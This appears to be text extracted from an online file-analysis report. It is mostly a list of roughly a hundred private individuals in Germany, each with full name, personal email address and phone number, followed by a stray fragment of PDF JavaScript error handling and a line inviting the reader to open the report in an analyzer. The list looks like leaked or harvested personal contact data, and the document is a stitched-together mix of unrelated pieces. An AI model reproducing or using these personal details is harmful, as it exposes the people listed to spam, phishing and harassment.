Udoh,Ini,mybyte3003@yahoo.de,Germany,(490176) 000-0000
Marc Oliver,Lesch,oliverundhannah@gmx.de,Germany,(491535) 333-9833
Dennis,David,dennisdavid92@gmx.de,Germany,(491575) 586-1162
Britt,Bremer,hauswartservice-bremer@t-online.de,Germany,(49160) 530-9072
Romy,Olczyk,Olczyk.romy@web.de,Germany,(49175) 197-4039
Beate,Brunner,be-brunner@t-online.de,Germany,(4920) 562-8537
Max,Berman,mackyjones@gmail.com,Germany,(491577) 729-0261
Timo,Vock,timo.vock@gmail.com,Germany,(49178) 187-5240
Karl- Heinz ,Belter ,karl-heinz-belter@t-online.de,Germany,(49366) 340-3179
Anton,Nagy,tonio13@web.de,Germany,(49696) 530-1656
Halil,Hajredini,halilhajredini@hotmail.de,Germany,(491609) 484-4694
Patrick,Koopman,koopmanp@yahoo.com,Germany,(491511) 083-2740
Thomas,Hynek,thomashynek29@yahoo.de,Germany,(491520) 884-6071
Alexej,Maljas,alexej-maljas@live.com,Germany,(491515) 403-0806
Arne,Schrey,schrey75@gnx.net,Germany,(491515) 984-3823
Gerhard,Will,Roy-Rogers@t-online.de,Germany,(499383) 903-8762
Egbert,Post,carshipcorp@gmail.com,Germany,(491765) 336-9743
Reinhard,Pfeiffer,r.peiffer@tele2.de,Germany,(49357) 197-5000
Ulrich,Schirpenbach,uli.schirpenbach@gmx.de,Germany,(49174) 207-0676
Erika,Werner,erika.werner3110@t-online.de,Germany,(49160) 356-4306
Michael,Kainz,milchkuh67@gmail.com,Germany,(491577) 493-4720
peter,h.,peter@byom.de,Germany,(491234) 525-6695
Heiko,Kubik,heiko0311@hotmail.de,Germany,(491522) 721-3671
Nandor,Cernus,nandorcernus@t-online.de,Germany,(492104) 138-5910
Frank,Zimmermann,fzm2000@web.de,Germany,(49178) 936-6933
Janett,Roek,nette81@hotmail.de,Germany,(491522) 293-1596
Ingo,Pavka,ingo.pavka@gmx.de,Germany,(49175) 202-8592
Peter,Sommer,Exensommer@web.de,Germany,(491522) 766-1195
Uwe,Krause,u.krause05@gmail.com,Germany,(491522) 928-3388
Goscha,Muller,Schmidt.johann1986@web.de,Germany,(49174) 608-2087
Bilstein,Struppek,bilsteinstruppek@outlook.com,Germany,(491512) 576-6113
Susanne,Stuckert,susi.stuckert47@gmail.com,Germany,(491763) 017-2977
Christos,Kotrotsios,chriscross72@web.de,Germany,ERR
Robert ,Kress ,robertkress@gmx.de,Germany,(49171) 380-8757
Bilgehan ,Bekki ,bilgehan_bekki@live.de,Germany,(49176) 471-6508
Heinrich,Ditel,hdjobber@gmail.com,Germany,(497232) 308-0820
Andy,Waclawczyk,pulpduisburg@gmx.de,Germany,(49160) 857-3872
Nico,Flanz,n.mueller5@web.de,Germany,(49385) 488-5955
Hermann,Schonrock,Hermannsch@gmx.de,Germany,(492091) 497-0409
Thoralf,Backer,thoralf.baecker@web.de,Germany,(491512) 017-0064
INGRID,TEWES,at-networking@web.de,Germany,(496343) 617-9284
Petra,Stockdteher,petrastockdreher75@gmail.com,Germany,(49162) 825-4957
Thomas,Kosziolleck,Thonet36@googlemail.com,Germany,(49175) 443-7482
Tuschkowski,Yvonne,y.tuschkowski@web.de,Germany,(49177) 667-7799
Juan Carlos,Schmidt Yanes,laeolicasalvaravidas@web.de,Germany,(491577) 851-6554
Kurt,Kahlke,kahlke.spo@gmail.com,Germany,(49170) 937-2893
Gerhard,Trefzer,ib.trefzer@web.de,Germany,(49781) 919-3194
Sven Martin,Schmidt,svenms1981@gmail.com,Germany,(491590) 130-7890
David,Brooks,david.brooks.trade@gmail.com,Germany,(491525) 195-2497
Peter,Heinrich,Pero-2002tii@gmx.de,Germany,(491762) 769-2081
Kerstin,Galander,mokka-mich-eisbar@t-online.de,Germany,(491577) 572-5993
katja,schwalbe,philweisse@gmx.de,Germany,(49174) 589-2454
Wolfgang Glock,Glock,thg-glock@t-online.de,Germany,(49171) 427-3706
Arno,Preis,arnopreis54@gmail.com,Germany,(49171) 141-1271
Volker,Lobbes,lobbes@hotmail.de,Germany,(491525) 341-4643
Andreas,Wittmann,ultimate_post@yahoo.com,Germany,(49173) 716-1323
Karin ,Jung,karl-jung52@hotmail.com,Germany,(491573) 170-2027
hanspeter,kiendl,1965fm@web.de,Germany,(4994) 314-2811
Kevin,Kretschmann ,kevin-kretschmann@web.de,Germany,(491573) 437-2831
Otar,maisuradze,ota-mais@yandex.ru,Germany,(491766) 331-0359
Marko,Anicic,anicic83@gmail.com,Germany,(491522) 467-8865
Steffen,Nitzschner,nitzschner-sf@gmx.de,Germany,(49163) 735-8914
Ralf,Slembek,ralf.slembek@online.de,Germany,(49170) 828-2217
Dieter,Lasshofer,dlasshofer@arcor.de,Germany,(493615) 188-3600
Florian,Wacker,wacker83193@gmail.com,Germany,(491525) 398-6938
Alexander,Schirdewahn ,alexanderschirde@gmail.com,Germany,(491767) 267-6394
Ralph,Hensel,ralph.hensel@gmx.de,Germany,(49359) 127-0573
Thomas,Link,linktkh@o2online.de,Germany,(498519) 885-9901
Angelika Fischer,Fischer,af1962@t-online.de,Germany,(492335) 844-7222
Juergen,Zschech,jzschech@gmx.de,Germany,(49172) 707-0749
Wolfgang,Westphal,stausee@gmx.de,Germany,(491762) 159-8065
Darko,Bilav,nikolinabilav@icloud.com,Germany,(49163) 574-7412
christian,eichhorn,eichel240@gmail.com,Germany,(49171) 622-5785
manfred,back,meinback@ish.de,Germany,(491764) 336-7909
Ekkehard,Westphal,ekkehardwestphal@gmx.de,Germany,(49422) 294-7553
mayelin,Acosta,a_mayelin23@yahoo.com,Germany,(491512) 255-8380
Wil,Thoms,w.thoms@web.de,Germany,(491051) 140-2342
Uwe Sinn,Sinn,u.sinn@gmx.de,Germany,(4971) 342-2807
David,Wei,weissdvd@gmail.com,Germany,(491523) 693-3722
Christian,Hartmann,chrisnew2022@gmail.com,Germany,(49174) 763-4541
Benjamin ,Sorg,sorg.benny@gmail.com,Germany,(49175) 783-1988
Otto,Engel,ottoengel1987@gmail.com,Germany,(49160) 283-7724
Justin ,Neuhaus ,Jneuhaus92@gmail.com,Germany,(49177) 186-8247
alexander,tews,vip.tews@list.ru,Germany,(491762) 151-3131
Ludwig,Scholl,schoell-osi@t-online.de,Germany,(49917) 996-3802
Evita,Leonhardt,evita.leonhardt@icloud.com,Germany,(49) 847-3950
werner,friedrich,friedschnurzel@freenet.de,Germany,(49332) 075-0878
Andreas,Rippin,andreasrippin@hotmail.com,Germany,(491575) 409-8266
thomas,Hanf,hanfthomas42@gmail.com,Germany,(491525) 698-6179
Herro,Herin,Herro@mail.de,Germany,(4930) 241-5889
michael,Belz,belzmichi@gmail.com,Germany,(49170) 303-1627
Peggy,Mundt,peggymundt74.p.m@gmail.com,Germany,(49162) 872-7235
Jens ,Schwieger ,jens-schwieger@web.de,Germany,(49174) 174-9935
Lets ,Sell ,letssell123@gmx.de,Germany,(491522) 939-8382
Stefan,Fust,info@elektro-fust.fe,Germany,(49171) 720-8113
Werner,Herold,werner.herold@vkkl.de,Germany,(49171) 622-5785
Kevin,Engler,kevin-engler@gmx.de,Germany,(49162) 746-3275
Otto,Heise,otto_heise@web.de,Germany,(491523) 369-0995
qadeer,javed,nehanqadeer2@gmail.com,Germany,(491521) 712-8881
Zueleha,Lekesiz,lekesiz672@gmail.com,Germany,(49173) 734-6040
Johann,Gruber,johanngruber@mail.de,Germany,(491522) 276-2116
Ahmed,Krouma,afr2003k@freenet.de,Germany,(49219) 146-2516
Julitta,karnagel,julittakarnagel@aol.com,Germany,(4915200) 684-2554
Kevin,Kubler,masterKevin1991@web.de,Germany,(491522) 357-6491
} catch (e) {
app.alert(e.message);
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.